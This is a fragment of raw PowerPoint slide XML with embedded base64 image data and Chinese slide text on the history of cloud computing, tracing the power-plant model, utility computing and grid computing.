Vpz7LLbq2kiybnnAZdIiOM+iqV6VP+21C19cTpNaZzKKktSW0OFT1LSCoTkurzeFan1iPVmuycvkMu6htSOipL4uITP7bxg6bX9cRGEI/atFcKKq/sikO1+tS0wyFPVNpZ1VkVMpzA9lrRrisyARlztkdZL4v64S7isqSVXtGoZjXROnfFjnLs2RGitNtRXPsPZFQkFAK8YS6SRsqaAI9Qj4TWaekEc1tV9yX06wkAQtN4+SmJlOUlpsV41Nb6oRSfsh7t1qVWm/jFlGtgFzCfvtHwmuSYXdT7bhGly+n7IQ5TY3G8fJSBGWGPTCXVGCT/Rpdk5cNjV4VLDlbxU4nZQuLedwx0SnojujmvgsqzteJ6pVHtGOlBsItOTMEEEAEB2ggO0AIfjVKnwaSeG8tUJllwdnNstJ9SIVUdHcQ8NOVFLy0sl2RnEBM2lAu4w4j+LfQPjWtZSSRcdcJSfwTW5ZazKMJqTQ1CpNWZdvO0bLSfNb1xIK5BEmcO10GxoVWB9Bd/DGPyerv9R1X6i7+GBBFOMuPgIasV3uAeuJBguoTLJLjqGm2cjksAqzh8q+3k63G5j2GH66CCKJVbjb9wu/hjeEtioICfEk+o/01Uxwq9eW32QJKsmWdl9HgASL2vqIwRE07QMQOrK10SrrUdSTJO6/4Y8zhuvf1DVfqLv4YHJDER8ERNfkziA6Cg1Un0F38MbsjgXEM2UlyR8AbUenPq5XqQfLPzJMCSe4QIPKrhBtzPBZYG3xnHCAPsjpeFdw3wgZFUqGuYKZJrMwXHE5VT00oZc+W+jaE9EdpudQYaMQSYggggDMEEEAeMw+hkAqJJOiUjdRit1RmnzRUH5dlCjvywc3z20+2Jud/SG//ABOf6RWx0EwBomkSHxX5sDsDaffB4pkf+vOfRJ98SMYgCP8AFEj8onPok++DxRI/KJv6JPviQ6oBEgj/ABTI/KJz6JPvg8UyHyic+iT74kIwIgGgKTIdcxOfRp98SVPlaXL2yNNurHyhJJ+a+gjzPVGU7nvgC1Sswh4FITlWm10HqjYiGpn6TLeiiJmACCCCA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964" name="AutoShape 4" descr="data:image/jpeg;base64,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966" name="AutoShape 6" descr="data:image/jpeg;base64,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968" name="AutoShape 8" descr="https://encrypted-tbn2.google.com/images?q=tbn:ANd9GcSDh0Lrop6Z76R2j2N4NSjYeeYmwQoh2s-g5F2I0V1qT_OxUDx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970" name="AutoShape 10" descr="https://encrypted-tbn3.google.com/images?q=tbn:ANd9GcTDjACWXU3px_8OiA1ya8PS9VAHpCwts1Q3SvqMHAFhW_HMKUUjM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0972" name="Picture 12" descr="http://www.rexwireless.com/todomatrix_iphone/images/iphone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196752"/>
            <a:ext cx="2416494" cy="3096344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40974" name="Picture 14" descr="http://hxdq.hisense.com/zxdt/gsxw/sckd/200908/W02009081451161666492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4109592"/>
            <a:ext cx="3552258" cy="2748408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40976" name="Picture 16" descr="http://shop.sxtvs.com/syssite/home/shop/1/pictures/productsimg/small/361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4221088"/>
            <a:ext cx="2752725" cy="2200275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40977" name="Picture 1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4008" y="1412776"/>
            <a:ext cx="2448272" cy="2869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http://img01.36krcnd.com/wp-content/uploads/2012/05/google-glass_sergey_brin_side_mai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36899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43608" y="1700808"/>
            <a:ext cx="705678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随时随地上网</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4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algn="ctr">
              <a:defRPr/>
            </a:pP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改变了使用互联网的方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400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algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400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algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400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algn="ctr">
              <a:defRPr/>
            </a:pP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但这不是传统意义的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4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云计算</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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835696" y="188640"/>
            <a:ext cx="57610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云计算的前世今生</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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844824"/>
            <a:ext cx="338437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电厂模式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2996952"/>
            <a:ext cx="338437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Utility Computing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581128"/>
            <a:ext cx="338437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网格计算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6021288"/>
            <a:ext cx="338437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云计算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2" descr="http://www.sd.gov.cn/picture/0/0611030922536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628800"/>
            <a:ext cx="4212192" cy="4680520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="椭圆形标注 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627784" y="980728"/>
            <a:ext cx="2016224" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60012"/>
              <a:gd name="adj2" fmla="val 7709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1875,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巴黎</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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4" name="椭圆形标注 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
